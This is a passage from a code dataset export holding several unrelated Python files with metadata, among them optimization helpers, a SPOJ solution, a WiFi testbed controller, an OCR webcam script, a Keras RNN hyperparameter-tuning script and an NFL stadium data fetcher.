np.linalg.norm(self.exact_dynamic - dynamic)\n\n def compare_exact(self, dynamic):\n dynamic = dynamic[:len(dynamic)//2] - dynamic[len(dynamic)//2:]\n unnormalized = (\n dynamic.reshape(self.exact_dynamic.shape).T / self.normalization_factors\n ).T\n return np.linalg.norm(self.exact_dynamic - unnormalized)\n\n def return_Psi(self):\n return self.Psi_test\n\n def return_Y(self):\n return self.Y_test\n\ndef polish_solution(\n Psi,\n y,\n active_set,\n barycentric_coordinates,\n tolerance=1.0e-10,\n threshold=0.0,\n type_criterion=\"FW\",\n time_limit=60.0,\n max_steps=100,\n):\n num_basis_functions = Psi.shape[0]\n dimension = y.shape[0]\n\n from scipy.sparse import csr_matrix\n from scipy.sparse import vstack\n matrix = csr_matrix(\n active_set[0].reshape((dimension, num_basis_functions)).dot(Psi).flatten()\n )\n for i in range(1, len(active_set)):\n matrix = vstack(\n (\n matrix,\n csr_matrix(\n active_set[i]\n .reshape((dimension, num_basis_functions))\n .dot(Psi)\n .flatten()\n ),\n )\n )\n\n quadratic = matrix.dot(matrix.T)\n linear = -matrix.dot(y.flatten())\n \n # print(quadratic)\n # print(linear)\n\n \n # Create objective function and feasible region.\n from feasible_regions import probability_simplex\n from functions import solution_polishing\n feas_reg = 
probability_simplex(len(active_set))\n fun_polishing = solution_polishing(quadratic, linear)\n from CINDy_algorithm import accelerated_projected_gradient_descent\n\n (\n x,\n polished_barycentric_coordinates,\n gap_values1,\n ) = accelerated_projected_gradient_descent(\n fun_polishing,\n feas_reg,\n active_set,\n tolerance,\n barycentric_coordinates,\n time_limit=time_limit,\n type_criterion=type_criterion,\n max_iteration=max_steps,\n )\n # return x, active_set, polished_barycentric_coordinates\n return remove_vertives(active_set, polished_barycentric_coordinates, threshold)\n\n\ndef remove_vertives(active_set, barycentric_coordinates, threshold):\n new_active_set = []\n new_barycentric_coordinates = []\n # print(barycentric_coordinates)\n for i in range(len(active_set)):\n if barycentric_coordinates[i] > threshold:\n new_active_set.append(active_set[i])\n new_barycentric_coordinates.append(barycentric_coordinates[i])\n aux = sum(new_barycentric_coordinates)\n new_barycentric_coordinates = [\n x + (1.0 - aux) / len(new_barycentric_coordinates)\n for x in new_barycentric_coordinates\n ]\n x = np.zeros(active_set[0].shape)\n for i in range(len(new_active_set)):\n x += new_barycentric_coordinates[i] * new_active_set[i]\n # print(x[np.where(x != 0.0)], np.where(x != 0.0), new_barycentric_coordinates)\n \n return x, new_active_set, new_barycentric_coordinates\n\n\n# Given a dynamic, test how closely it resembles the testing data.\nclass normalization_and_recovery:\n def __init__(self, X):\n self.normalization_factors = np.linalg.norm(X, axis=1)[:, None]\n self.num_basis_functions = X.shape[0]\n return\n\n # Divide each collection of samples by the norm of the samples.\n def normalize(self, X):\n return X / self.normalization_factors\n\n def unnormalize(self, X):\n return X * self.normalization_factors\n\n def return_normalization_factors(self):\n return self.normalization_factors\n\n # Divide each collection of samples by the norm of the samples.\n def recover_solution(self, Sol):\n if Sol.ndim == 2 and Sol.shape[1] == self.num_basis_functions:\n return (Sol.T / self.normalization_factors).T\n else:\n dimension = int(Sol.shape[0] / self.num_basis_functions)\n return (\n Sol.reshape(dimension, self.num_basis_functions).T\n / self.normalization_factors\n ).T\n\n # Divide each collection of samples by the norm of the samples.\n def unnormalize_solution(self, Sol):\n if Sol.ndim == 2 and Sol.shape[1] == self.num_basis_functions:\n return (Sol.T * self.normalization_factors).T\n else:\n dimension = int(Sol.shape[0] / self.num_basis_functions)\n return (\n Sol.reshape(dimension, self.num_basis_functions).T\n * self.normalization_factors\n ).T\n\n\n# Divide each collection of samples by the norm of the samples.\ndef normalize_data(X):\n return X / np.linalg.norm(X, axis=1)[:, None]\n\n\n# Divide each collection of samples by the norm of the samples.\ndef transform_solution(Sol, X):\n return (Sol.T * np.linalg.norm(X, axis=1)[:, None]).T\n\n\ndef repeat_along_diag(a, r):\n m, n = a.shape\n out = np.zeros((r, m, r, n), dtype=a.dtype)\n diag = np.einsum(\"ijik->ijk\", out)\n diag[:] = a\n return out.reshape(-1, n * r)\n","sub_path":"auxiliary_functions.py","file_name":"auxiliary_functions.py","file_ext":"py","file_size_in_byte":40306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"542567402","text":"# https://www.spoj.com/problems/STPAR/\n\ndef street_parade(l):\n stack=[]\n new_line=[]\n index=1\n for truck in l:\n if truck!=index:\n if 
len(stack)!=0:\n for j in range(len(stack)):\n if stack[-1]==index:\n new_line.append(stack[-1])\n stack.pop()\n index+=1\n else:\n break\n if truck==index:\n new_line.append(truck)\n index+=1\n else:\n stack.append(truck)\n else:\n stack.append(truck)\n else:\n new_line.append(truck)\n index+=1\n #print(stack)\n for i in range(len(stack)):\n new_line.append(stack[-1])\n stack.pop()\n #print (new_line)\n if new_line == sorted(l):\n print (\"yes\")\n else:\n print (\"no\")\n \ncont=True\nwhile cont:\n n = int(input())\n if n == 0:\n cont=False\n break\n l = [int(x) for x in input().split()]\n street_parade(l)","sub_path":"SPOJ/street_parade.py","file_name":"street_parade.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"269307582","text":"#!/usr/bin/python\n__author__ = 'Pierluigi Gallo'\n\"\"\"\nEU project WISHFUL\n\"\"\"\n# from upis.upi_rn import UPI_RN\n# from upis.upi_m import UPI_M\n# from upis.upi_rn import UPI_RN\n#\n# from common.upihelper import from_unix_time, unix_time_as_tuple, get_now_full_second\n# from helpers.application import ServerApplication, ClientApplication\n# from helpers.mac_layer import EdcaQueueParameters\n# from common.upihelper import Time\nfrom controller.wishful_controller.node_manager import *\n# from helpers.helper import NetworkFunctionHelper\n# from helpers.helper import NetworkHelper, RadioHelper\n# from functools import partial\nfrom datetime import date, datetime, timedelta\nimport re\nimport time\nimport sys\nimport csv\n\nclass WiFiNode(Node):\n \"\"\"\n This class defines an WiFi node and takes the most appropriate actions in order to :\n Set wireless lan interface ip address and network role (Station/AccessPoint)\n Stores/Removes low level measurements\n Store the low level measurements type\n \"\"\"\n def __init__(self, node):\n \"\"\" Creates a new WiFiNode\n \"\"\"\n super( WiFiNode, self ).__init__(node)\n eth_ipAddress_part = re.split(r'[:./\\s]\\s*', str(node))\n self.wlan_ipAddress = '192.168.3.' 
+ eth_ipAddress_part[3]\n self.last_bunch_measurement = []\n self.measurement_types = []\n self.role = None\n self.platform = None\n\n def add_measure(self, measure):\n \"\"\" Adds a measure or a list of measurable in the list of node measurement\n :param measure: list of measure to add at last_bunch_measurement object attribute\n \"\"\"\n self.last_bunch_measurement.append(measure)\n\n def get_available_measures(self):\n \"\"\" Gets the available measure of the node\n :return measure_list: the list of measure stored until now\n \"\"\"\n return self.last_bunch_measurement\n\n\nclass TestbedTopology:\n \"\"\"\n This class defines an experiment controller and takes the most appropriate actions in order to :\n Create the WiFiNode and Nodelist\n Setup the nodes roles (AP/STA)\n Setup the wireless network (Network create and station association)\n Managing the interface with WiSHFUL controller\n \"\"\"\n\n def __init__(self, testbed_name, log):\n \"\"\" create a new testbed topology whose nodes belong to the same group\n \"\"\"\n # name of the experiment group; only nodes of this group can be controlled\n self.exp_group_name=testbed_name\n self.log = log\n\n #used to save specific information for WiFi node\n self.wifi_ap_wmp_nodes = []\n self.wifinodes = [] #\n self.athnodes = [] #\n\n #used to run UPI function on node\n self.nodes = [] #\n self.ap_wmp_nodes = [] #\n self.wmp_nodes = [] #\n self.ath_nodes = [] #\n\n #used to save the total number of node present in the experiment\n self.experiment_nodes_number = 0\n self.wmp_nodes_number = 0\n self.ath_nodes_number = 0\n\n def setExperimentNodesNumber(self, nodes_number):\n # for ttilab testbed\n # 1 10.163.8.26 alix2 AP\n # 2 10.163.8.44 alix5 STA1\n # 3 10.163.8.57 alix7 STA2\n # 4 10.163.8.60 alix10 STA3\n # 5 10.163.8.69 alix11 STA4\n # 6 10.163.8.70 alix12 STA5\n # 7 10.163.8.71 alix13 STA6\n self.experiment_nodes_number = nodes_number\n return\n\n def getExperimentNodesNumber(self):\n return self.experiment_nodes_number\n\n\n def add_wmp_node(self, node, role):\n if role == 'AP':\n self.ap_wmp_nodes.append(node)\n elif role == 'STA':\n self.wmp_nodes.append(node)\n else:\n self.log.error('Error in node role : %s' % role)\n\n\n def setAP(self, node, essid):\n \"\"\" Creates infrastructure BSS, uses node such as Access Point\n :param node: elected Access Point Node\n :param essid: the SSID\n \"\"\"\n # UPI_R function is execute immediately\n exec_time = None\n\n # eth_ipAddress_part = re.split(r'[:./\\s]\\s*', str(node))\n # wlan_ipAddress = '192.168.3.' + eth_ipAddress_part[6]\n # UPIfunc = UPI_M.initTest\n # UPIargs = {'interface' : 'wlan0', 'operation' : ['create-network'], 'ssid' : [essid], 'ip_address' : [wlan_ipAddress] }\n # try:\n # rvalue = self.global_mgr.runAt(node, UPIfunc, UPIargs, exec_time)\n # self.log.info('Ret value of blocking call is %s' % str(rvalue))\n # except Exception as e:\n # self.log.fatal(\"An error occurred : %s\" % e)\n # return False\n\n def setSTA(self, node, essid):\n \"\"\" Associate node to infrastructure BSS\n\n :param node: elected station node by associate\n :param essid: the SSID\n \"\"\"\n\n # # UPI_R function is execute immediately\n # exec_time = None\n #\n # eth_ipAddress_part = re.split(r'[:./\\s]\\s*', str(node))\n # wlan_ipAddress = '192.168.3.' 
+ eth_ipAddress_part[6]\n # UPIfunc = UPI_M.initTest\n # UPIargs = {'interface' : 'wlan0', 'operation' : ['association'], 'ssid' : [essid], 'ip_address' : [wlan_ipAddress] }\n # try:\n # rvalue = self.global_mgr.runAt(node, UPIfunc, UPIargs, exec_time)\n # self.log.info('Ret value of blocking call is %s' % str(rvalue))\n # except Exception as e:\n # self.log.fatal(\"An error occurred : %s\" % e)\n # return False\n\n def initializeTestbedFunctions(self, controller):\n \"\"\" Setups all the node in the experiment, executes the follow operation :\n installs the execution environment or execution engine\n restarts module and microcode\n executes the node role\n\n :return result: True if the operation are successful execute, False otherwise\n \"\"\"\n\n self.log.info(' %s - SETUP NODES' % self.initializeTestbedFunctions.__name__)\n\n # All the UPI functions are execute immediately\n # UPIargs = {'execution_engine' : ['runtime/connectors/wmp_linux/execution_engine/factory'] }\n # rvalue = controller.nodes(self.ap1).radio.iface(\"wlan0\").install_execution_engine(UPIargs)\n # self.log.debug('Ret value of blocking call is %s' % str(rvalue))\n # UPIargs = {'interface' : 'wlan0', 'operation' : ['module'] }\n # rvalue = controller.nodes(self.ap1).radio.iface(\"wlan0\").init_test(UPIargs)\n # self.log.debug('Ret value of blocking call is %s' % str(rvalue))\n\n UPIargs = {'execution_engine' : ['../../../agent_modules/wifi_wmp/execution_engine/wmp'] }\n #UPIargs = {'execution_engine' : ['.... /execution_engine/medca-openfwwf-logcw'] }\n rvalue = controller.nodes(self.wmp_nodes).radio.iface(\"wlan0\").install_execution_engine(UPIargs)\n self.log.debug('Ret value of blocking call is %s' % str(rvalue))\n UPIargs = {'interface' : 'wlan0', 'operation' : ['module'] }\n rvalue = controller.nodes(self.wmp_nodes).radio.iface(\"wlan0\").init_test(UPIargs)\n self.log.debug('Ret value of blocking call is %s' % str(rvalue))\n\n self.log.debug('ath_nodes_number : %s - wmp_nodes_number : %s' % (str(self.ath_nodes_number), str(self.wmp_nodes_number) ) )\n self.log.debug('len ath_nodes_number : %s - len wmp_nodes_number : %s' % (str(len(self.athnodes)), str(len(self.wifinodes) ) ) )\n\n # self.setAP(self.ap1, self.exp_group_name)\n # node_index = 0\n # while node_index < self.wmp_nodes_number :\n # self.setSTA(self.wifinodes[node_index], self.exp_group_name)\n # node_index += 1\n #\n # self.log.warning('Configure EDCA parameters for each hardware queue in wireless card (Atheros AR928X)')\n # # queueParam0 = EdcaQueueParameters(aifs=1, cwmin=1, cwmax=3, txop=900)\n # # queueParam1 = EdcaQueueParameters(aifs=50, cwmin=15, cwmax=63, txop=4)\n # # queueParam2 = EdcaQueueParameters(aifs=55, cwmin=63, cwmax=127, txop=2)\n # # queueParam3 = EdcaQueueParameters(aifs=123, cwmin=127, cwmax=511, txop=0)\n # queueParam0 = EdcaQueueParameters(aifs=3, cwmin=30, cwmax=30, txop=1)\n # queueParam1 = EdcaQueueParameters(aifs=3, cwmin=30, cwmax=30, txop=1)\n # queueParam2 = EdcaQueueParameters(aifs=3, cwmin=30, cwmax=30, txop=1)\n # queueParam3 = EdcaQueueParameters(aifs=3, cwmin=30, cwmax=30, txop=1)\n #\n # node_index = 0\n # while node_index < self.ath_nodes_number :\n # self.setSTA(self.athnodes[node_index], self.exp_group_name)\n #\n # self.radioHelper.setEdcaParameters(self.athnodes[node_index], ifname='wlan0', queueId=0, qParam=queueParam0)\n # self.radioHelper.setEdcaParameters(self.athnodes[node_index], ifname='wlan0', queueId=1, qParam=queueParam1)\n # self.radioHelper.setEdcaParameters(self.athnodes[node_index], ifname='wlan0', 
queueId=2, qParam=queueParam2)\n # self.radioHelper.setEdcaParameters(self.athnodes[node_index], ifname='wlan0', queueId=3, qParam=queueParam3)\n #\n # qParams = self.radioHelper.getEdcaParameters(self.athnodes[node_index], ifname='wlan0')\n # self.radioHelper.printEdcaParameters(self.athnodes[node_index], ifname='wlan0', qParam=qParams)\n # node_index += 1\n\n return True\n","sub_path":"wmp/wmp_remote_controller/wmp_helper/TestbedTopology.py","file_name":"TestbedTopology.py","file_ext":"py","file_size_in_byte":9404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"299116630","text":"import tkinter as tk\nimport tkinter.ttk as ttk\n\nfrom sqlite3 import *\n\n\nclass Table(tk.Frame):\n def __init__(self, parent=None, headings=tuple(), rows=tuple()):\n super().__init__(parent)\n\n table = ttk.Treeview(self, show=\"headings\", selectmode=\"browse\")\n table[\"columns\"] = headings\n table[\"displaycolumns\"] = headings\n\n for head in headings:\n table.heading(head, text=head, anchor=tk.CENTER)\n table.column(head, anchor=tk.CENTER)\n\n for row in rows:\n table.insert('', tk.END, values=tuple(row))\n\n scrolltable = tk.Scrollbar(self, command=table.yview)\n table.configure(yscrollcommand=scrolltable.set)\n scrolltable.pack(side=tk.RIGHT, fill=tk.Y)\n table.pack(expand=tk.YES, fill=tk.BOTH)\n\n\nclass records:\n def __init__(self):\n root = tk.Tk()\n root.title('Рекорды')\n names = (\n 'Сортировка \"пузырьком\".', 'Сортировка \"Вставками\"', '\"Быстрая\" сортировка.',\n '\"Быстрая\" сортировка с асинхронностью.',\n 'Сортировка подсчётом.')\n conn = connect('project_trpo')\n cursor = conn.cursor()\n cursor.execute(\"SELECT USERNAME, result, topic FROM Records ORDER BY topic, result DESC\")\n table = Table(root, headings=('Имя пользователя', 'Результат', 'Тема'),\n rows=tuple(((*polya, names[topic]) for *polya, topic in cursor.fetchall())))\n table.pack(expand=tk.YES, fill=tk.BOTH)\n root.mainloop()\n\n\nif __name__ == \"__main__\":\n records()\n","sub_path":"records.py","file_name":"records.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"492471488","text":"import logging\nfrom typing import Union\n\nfrom twisted.internet.defer import Deferred, inlineCallbacks\n\nfrom peek_plugin_diagram._private.client.controller.GridCacheController import \\\n GridCacheController\nfrom vortex.Payload import Payload\nfrom vortex.TupleSelector import TupleSelector\nfrom vortex.handler.TupleDataObservableHandler import TuplesProviderABC\n\nlogger = logging.getLogger(__name__)\n\n\nclass GridCacheIndexTupleProvider(TuplesProviderABC):\n def __init__(self, gridCacheController: GridCacheController):\n self._gridCacheController = gridCacheController\n\n @inlineCallbacks\n def makeVortexMsg(self, filt: dict,\n tupleSelector: TupleSelector) -> Union[Deferred, bytes]:\n tuples = [\n [i[0], i[1]]\n for i in self._gridCacheController.encodedChunkLastUpdateByKey().items()\n ]\n sorted(tuples, key=lambda i: i[0])\n\n start = tupleSelector.selector.get('start')\n count = tupleSelector.selector.get('count')\n\n if start is not None and count:\n tuples = tuples[start:count]\n\n payloadEnvelope = yield Payload(filt, tuples=tuples).makePayloadEnvelopeDefer()\n vortexMsg = yield payloadEnvelope.toVortexMsgDefer()\n return 
vortexMsg\n","sub_path":"peek_plugin_diagram/_private/client/tuple_providers/GridCacheIndexTupleProvider.py","file_name":"GridCacheIndexTupleProvider.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"26496494","text":"from utils import data_generator\nfrom utils.constituent_building import *\nfrom utils.conjugate import *\nfrom utils.randomize import choice\n\nclass CSCGenerator(data_generator.BenchmarkGenerator):\n def __init__(self):\n super().__init__(field=\"syntax\",\n linguistics=\"island_effects\",\n uid=\"complex_NP_island\",\n simple_lm_method=True,\n one_prefix_method=False,\n two_prefix_method=False,\n lexically_identical=True)\n\n self.predicates = np.union1d(all_refl_preds, get_all(\"category_2\", \"Adj_comp_than\"))\n self.safe_subjs = np.setdiff1d(all_nominals, all_proper_names)\n\n def sample(self):\n # Who did the man that helped John see?\n # wh Aux_mat Subj Rel Aux_emb V_emb Obj V_mat\n # Who did John see the man that helped?\n # wh Aux_mat Obj V_mat Subj Rel Aux_emb V_emb\n\n V_mat = choice(get_all(\"finite\", \"0\", self.predicates))\n Subj = N_to_DP_mutate(choice(\n get_matches_of(V_mat, \"arg_2\",\n get_matches_of(V_mat, \"arg_1\", self.safe_subjs))))\n Aux_mat = return_aux(V_mat, Subj)\n V_emb = choice(get_matched_by(Subj, \"arg_1\", self.predicates))\n Aux_emb = return_aux(V_emb, Subj)\n Obj = N_to_DP_mutate(choice(\n get_matches_of(V_emb, \"arg_2\",\n get_matches_of(V_mat, \"arg_1\",\n get_matches_of(Aux_mat, \"arg_1\", all_nominals)))))\n Wh = choice(get_matches_of(V_mat, \"arg_2\",\n get_matches_of(V_emb, \"arg_2\", all_wh_words)))\n Rel = choice(get_matched_by(Subj, \"arg_1\", all_relativizers))\n\n data = {\n \"sentence_good\": \"%s %s %s %s %s %s %s %s?\" % (Wh[0], Aux_mat[0], Subj[0], Rel[0], Aux_emb[0], V_emb[0], Obj[0], V_mat[0]),\n \"sentence_bad\": \"%s %s %s %s %s %s %s %s?\" % (Wh[0], Aux_mat[0], Obj[0], V_mat[0], Subj[0], Rel[0], Aux_emb[0], V_emb[0])\n }\n return data, data[\"sentence_good\"]\n\ngenerator = CSCGenerator()\ngenerator.generate_paradigm(rel_output_path=\"outputs/benchmark/%s.jsonl\" % generator.uid)\n\n","sub_path":"Spanish_Benchmark/English_Categories/island_effects/complex_NP_island.py","file_name":"complex_NP_island.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"85234171","text":"import time\r\n\r\n#py tesseract (also works with Raspbery Py)\r\nimport pytesseract\r\n#Open CV (also works with Raspbery Py)\r\nimport cv2\r\n\r\nimport os\r\nfrom PIL import Image, ImageEnhance, ImageFilter\r\ntessdata_dir_config = '--psm 6 --tessdata-dir \"C:\\\\Program Files (x86)\\\\Tesseract-OCR\\\\tessdata\"'\r\n# Example config: '--tessdata-dir \"C:\\\\Program Files (x86)\\\\Tesseract-OCR\\\\tessdata\"'\r\n# It's important to include double quotes around the dir path.\r\ncamera_port = 1\r\ncamera = cv2.VideoCapture(camera_port)\r\ntime.sleep(0.1) \r\n\r\nif not os.path.exists('Images/image_frames'):\r\n\tos.makedirs('Images/image_frames')\r\n\r\nindex=0\r\nwhile camera.isOpened():\r\n\tret,frame=camera.read()\r\n\tindex=index+1\r\n\tif ((index%1)==0):\r\n\t\timgH, imgW, _ = frame.shape\r\n\t\tx1,y1,w1,h1=0,0,imgH,imgW\r\n\t\ttext = pytesseract.image_to_string(frame, lang = 'eng')\r\n\t\timageBoxes = pytesseract.image_to_boxes(frame)\r\n\t\tfor boxes in imageBoxes.splitlines():\r\n\t\t\tboxes= boxes.split(' 
')\r\n\t\t\tx,y,w,h=int(boxes[1]),int(boxes[2]),int(boxes[3]),int(boxes[4])\r\n\t\t\tcv2.rectangle(frame,(x,imgH-y),(w, imgH-h),(0,255,0),3)\t\r\n\r\n\r\n\t\tif (text.find('CAT') != -1):\r\n\t\t\ttext= \"Yayyyy its a CAT!\"\r\n\t\t\r\n\r\n\t\tcv2.putText(frame,text, (x1+int(w1/50),y1+int(h1/50)), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0,0,255), 2)\r\n\t\tfont=cv2.FONT_HERSHEY_SIMPLEX\r\n\t\tcv2.imshow('OCR', frame)\r\n\t\tif cv2.waitKey(2) & 0xFF == ord('q'):\r\n\t\t\tbreak\r\n\t#name = './Images/image_frames' + str(index) + '.png'\r\n\t#print ('frames')\r\n\t# cv2.imwrite(name,frame)\r\n\t\r\n\t#if cv2.waitkey(10)& 0xff == ord('q'):\r\n\t#\tbreak\r\n\r\ncamera.release()\r\ncv2.destroyAllWindows()","sub_path":"Clay OCR.py","file_name":"Clay OCR.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"214899214","text":"import argparse\nimport logging\n\nimport os\nimport keras\nimport numpy as np\nfrom keras import backend as K\nfrom keras.callbacks import TensorBoard\n\nimport nni\n\nfrom keras.models import Sequential\nfrom keras.layers import SimpleRNN, Dense\n\nfrom pandas import read_csv\nfrom sklearn.preprocessing import LabelBinarizer\n\nLOG = logging.getLogger('mnist_soc_annot')\n\nlook_back = 15\nfeature = 3 # voltage and current and temp\n\nlogger = logging.getLogger('mnist_AutoML')\n\nclass socNetwork(object):\n '''\n For initializing and building the deep learning network\n '''\n \n \n def __init__(self, \n hidden_size_1, hidden_size_2, hidden_size_3):\n \"\"\"@nni.variable(nni.choice(8, 64, 128), name=self.hidden_size_1)\"\"\"\n self.hidden_size_1 = hidden_size_1\n \"\"\"@nni.variable(nni.choice(8, 64, 128), name=self.hidden_size_2)\"\"\"\n self.hidden_size_2 = hidden_size_2\n \"\"\"@nni.variable(nni.choice(8, 64, 128), name=self.hidden_size_3)\"\"\"\n self.hidden_size_3 = hidden_size_3\n \n \n def build_network(self):\n '''\n Build the network\n '''\n model = Sequential()\n model.add(SimpleRNN(self.hidden_size_1, input_shape=(look_back, feature), return_sequences=True))\n model.add(SimpleRNN(self.hidden_size_2, return_sequences=True))\n model.add(SimpleRNN(self.hidden_size_3))\n model.add(Dense(1, activation='sigmoid'))\n model.compile(loss='mse', optimizer='Adam', metrics=['mse'])\n return model\n \n def train(self, trainX, trainY, textX, testY):\n model = self.build_network()\n model.fit(x=trainX, y=trainY, validation_split=0.15, epochs=5)\n \n _, score = model.evaluate(textX, testY, verbose=0)\n logger.debug('Final result is: %d', score)\n logger.debug('Send final result done.')\n \"\"\"@nni.report_final_result(score)\"\"\"\n\n \n\ndef main(params):\n '''\n Main function, build mnist network, run and send result to NNI.\n '''\n dataframe_trainset = read_csv(\n 'dataset/different_cycle_train_test/train_FUDS_BJDST_US06.csv', header=0, index_col=0)\n dataframe_testset = read_csv(\n 'dataset/different_cycle_train_test/test_DST.csv', header=0, index_col=0)\n \n def create_dataset(dataset, look_back=1):\n dataX, dataY = [], []\n for i in range(len(dataset)-look_back-1):\n # use first and second column in the dataset\n a = dataset[i:(i+look_back), 0:3]\n dataX.append(a)\n # the output is at the third column of the dataset\n dataY.append(dataset[i + look_back, 3])\n return np.array(dataX), np.array(dataY)\n \n train_dataset = dataframe_trainset.values\n test_dataset = dataframe_testset.values\n \n trainX, trainY = create_dataset(train_dataset, look_back)\n testX, testY = 
create_dataset(test_dataset, look_back)\n \n soc_network = socNetwork(hidden_size_1=params['hidden_size_1'], hidden_size_2=params['hidden_size_2'], hidden_size_3=params['hidden_size_3'])\n soc_network.build_network()\n soc_network.train(trainX, trainY, testX, testY)\n \n\n\ndef get_params():\n ''' Get parameters from command line '''\n parser = argparse.ArgumentParser()\n # parser.add_argument(\"--data_dir\", type=str, default='/tmp/tensorflow/mnist/input_data', help=\"data directory\")\n # parser.add_argument(\"--dropout_rate\", type=float, default=0.5, help=\"dropout rate\")\n # parser.add_argument(\"--channel_1_num\", type=int, default=32)\n # parser.add_argument(\"--channel_2_num\", type=int, default=64)\n # parser.add_argument(\"--conv_size\", type=int, default=5)\n # parser.add_argument(\"--pool_size\", type=int, default=2)\n parser.add_argument(\"--hidden_size_1\", type=int, default=8)\n parser.add_argument(\"--hidden_size_2\", type=int, default=8)\n parser.add_argument(\"--hidden_size_3\", type=int, default=8)\n # parser.add_argument(\"--learning_rate\", type=float, default=1e-4)\n # parser.add_argument(\"--batch_num\", type=int, default=2000)\n # parser.add_argument(\"--batch_size\", type=int, default=32)\n\n args, _ = parser.parse_known_args()\n return args\n\n\n\nif __name__ == \"__main__\":\n '''@nni.get_next_parameter()'''\n try:\n main(vars(get_params()))\n except Exception as exception:\n logger.exception(exception)\n raise\n","sub_path":"Objective_2/Hyperparam_tuning/soc_nni_annot_rnn/soc-keras_annot.py","file_name":"soc-keras_annot.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"285640970","text":"from .base import BaseField\nfrom protobuf3.wire_types import FIELD_VARINT\n\n\nclass Int32Field(BaseField):\n DEFAULT_VALUE = 0\n WIRE_TYPE = FIELD_VARINT\n\n def _convert_to_final_type(self, value):\n if value >= 2 ** 31:\n return -(2 ** 64 - value)\n\n return value\n\n def _convert_to_wire_type(self, value):\n if value < 0:\n return 2 ** 64 + value\n\n return value\n\n def _validate(self, value):\n return isinstance(value, int) and -2 ** 31 <= value < 2 ** 31\n","sub_path":"garbagebot/lib/python3.6/site-packages/protobuf3/fields/int32.py","file_name":"int32.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"10300645","text":"#creating pole figures from synchrotrone SUMM INTEGRATED data\n\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\nfor i in range (1,2):\n peaks = [1,4,5,6,7,8,9]\n\n print (peaks [i])\n loaddir = \"/home/ivanov/SYN/TiTaNb5/2D/SUMM/POLE/NORM/1_-80-0/peak_%s\"%peaks[i]\n savedir = \"/home/ivanov/SYN/TiTaNb5/2D/SUMM/POLE/NORM/1_-80-0/peak_%s\"%peaks[i]\n loadfile = os.path.join(loaddir, \"intlist_peak%s.txt\"%peaks[i])\n\n intensity = np.array (np.loadtxt(loadfile))\n #intensity=np.ma.masked_where(intensity<1,intensity)\n #icorrm=[]\n #omega = 80\n #mu = 911.5638000000001 # sm**-1\n #t = 0.1 # sm\n #theta = [3.1795, 3.6205, 4.7005, 4.9525, 5.5105, 6.0685, 6.3655]\n\n #corrections\n\n #for j in range(81):\n # for k in range (360):\n # R = (np.cos(np.radians(theta[i]))*(np.exp(-mu*t/np.cos(np.radians(theta[i]-omega)))-\n # np.exp(-mu*t/np.cos(np.radians(theta[i]+omega))))/\n # mu*t*np.exp(-mu*t/np.cos(np.radians(theta[i])))*\n # 
(np.cos(np.radians(theta[i]-omega))/np.cos(np.radians(theta[i]+omega))-1))#*intensity[80,k]\n\n # intensity [j,k] = intensity[j,k]*R\n\n # omega = omega - 1\n #print (j, k, omega)\n #print(R)\n # icorrm.append(R)\n\n #icorrm=np.array(icorrm)\n #print (icorrm)\n #omega = np.linspace(0,80,81)\n #I, O = np.meshgrid (icorrm, omega)\n #plt.plot(I)\n #plt.show()\n\n plt.imshow(intensity, cmap=cm.jet)\n savefile = os.path.join(savedir, \"map_%s\" % peaks[i] + \".png\")\n plt.savefig(savefile, dpi=300)\n plt.show()\n plt.clf()\n\n\n beta = np.radians(np.linspace(0, 360, 360))\n alpha = np.radians(np.linspace(0, 81, 81))\n B, A = np.meshgrid (beta, alpha)\n\n ax = plt.subplot(111, polar=True)\n ax.set_yticklabels([])\n\n ctf = ax.contourf(B, A, intensity, 300, cmap=cm.jet)\n plt.colorbar(ctf)\n plt.grid(False)\n plt.show()\n\n savefile = os.path.join(savedir, \"polar_fig_%s\"%peaks[i] + \".png\")\n plt.savefig(savefile, dpi=300)\n plt.clf()\n\n\n","sub_path":"DESY_2017/Texture/linux/5. polefigures_draw.py","file_name":"5. polefigures_draw.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"233002942","text":"import requests\nfrom models.stadium import StadiumModel\n\n\nclass StadiumController:\n nfl_endpoint = 'https://feeds.nfl.com/feeds-rs/scores.json'\n\n @classmethod\n def populate_stadiums(cls):\n rss_feed = requests.get(cls.nfl_endpoint)\n\n json_data = rss_feed.json()\n\n games = json_data['gameScores']\n\n for game in games:\n schedule_info = game['gameSchedule']\n stadium_info = schedule_info['site']\n\n stadium = StadiumModel.find_by_id(stadium_info['siteId'])\n\n if not stadium:\n new_stadium_id = stadium_info['siteId']\n new_stadium_city = stadium_info['siteCity']\n new_stadium_name = stadium_info['siteFullname']\n new_stadium_state = stadium_info['siteState']\n new_stadium_roof_type = stadium_info['roofType']\n new_stadium = StadiumModel(new_stadium_id, new_stadium_city, new_stadium_name, new_stadium_state,\n new_stadium_roof_type)\n new_stadium.upsert()\n\n stadiums = StadiumModel.find_all()\n return {'stadiums': [stadium.json() for stadium in stadiums]}\n\n\n\n\n\n\n\n\n\n\n","sub_path":"controllers/stadium.py","file_name":"stadium.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"8488205","text":"#!/usr/bin/env python\n# -*- coding: utf-8 